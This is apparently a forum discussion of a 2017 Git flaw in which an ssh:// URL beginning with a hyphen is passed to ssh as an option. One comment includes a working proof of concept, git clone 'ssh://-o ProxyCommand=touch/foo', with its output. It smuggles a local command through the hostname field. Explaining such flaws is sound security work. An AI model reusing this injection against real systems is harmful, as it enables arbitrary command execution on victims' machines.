6 comments

[ 2.9 ms ] story [ 26.6 ms ] thread
Is there a high level write up about this somewhere? I can't figure out off the top of my head how a hostname that starts with a hyphen and gets mistaken for an ssh option causes arbitrary local command execution. Wouldn't the first word of the remote git command slide over and become the hostname?
I haven't actually tried this, but I would assume that the exploit would involve tricking Git into passing an ssh_config(5) option (though -o or through -F) which then has a ProxyCommand or LocalCommand that will run on the local machine.

EDIT: Yeah, here's a sample exploit. Popping a shell is left as an exercise to the reader.

    % git version
    git version 2.14.0
    % git clone 'ssh://-o ProxyCommand=touch/foo'
    Cloning into 'foo'...
    Pseudo-terminal will not be allocated because stdin is not a terminal.
    touch: missing file operand
    Try 'touch --help' for more information.
    ssh_exchange_identification: Connection closed by remote host
    fatal: Could not read from remote repository.

    Please make sure you have the correct access rights
    and the repository exists.
The perfect project for a rewrite in better, 'SAFER' and efficient language like rust is 'git'. Keep writing this in C and you'll see newer security fix that wouldn't have existed if you haven't written it in C.
Could this not have been fixed by prefixing the '--' argument on the command line, and requiring that all ssh implementations must implement that in order to be compatible?

Seriously, why are we still dealing with what amounts to a quoting issue in 2017?

Because git is implemented as a series of scripts around some core C (or Perl) programs. Really cool project, horrible architecture. I don't use Mercurial, but it's kinda nice that they only use one language.